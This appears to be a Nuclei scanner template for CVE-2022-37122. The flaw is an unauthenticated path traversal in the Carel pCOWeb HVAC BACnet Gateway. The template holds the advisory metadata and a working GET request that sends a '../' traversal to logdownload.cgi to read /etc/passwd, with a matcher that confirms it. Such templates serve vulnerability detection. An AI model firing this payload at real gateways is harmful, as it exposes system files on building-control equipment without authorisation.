复制
id: CVE-2022-37122
info:
name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Path Traversal
author: gy741
severity: high
description: |
Carel pCOWeb HVAC BACnet Gateway 2.1.0 contains an unauthenticated arbitrary file disclosure caused by improper verification of the 'file' GET parameter in logdownload.cgi, letting attackers disclose sensitive files via directory traversal, exploit requires no authentication.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php
- https://www.zeroscience.mk/codes/carelpco_dir.txt
- https://packetstormsecurity.com/files/167684/
- https://nvd.nist.gov/vuln/detail/CVE-2022-37122
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-37122
cwe-id: CWE-22
epss-score: 0.53074
epss-percentile: 0.97828
metadata:
max-request: 1
vendor: carel
product: pcoweb_hvac_bacnet_gateway
tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet,vuln
http:
- method: GET
path:
- "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:.*:0:0:"
# digest: 490a0046304402205796cf0140a3abf449b0faa382824d0a0ebf29abb300f48c5d6d305b3c8900dd022076650bca15de0f0569d8af093d94ac7dce95ec6d6d5e018e0b411747690f84a6:922c64590222798bb761d5b6d8e72950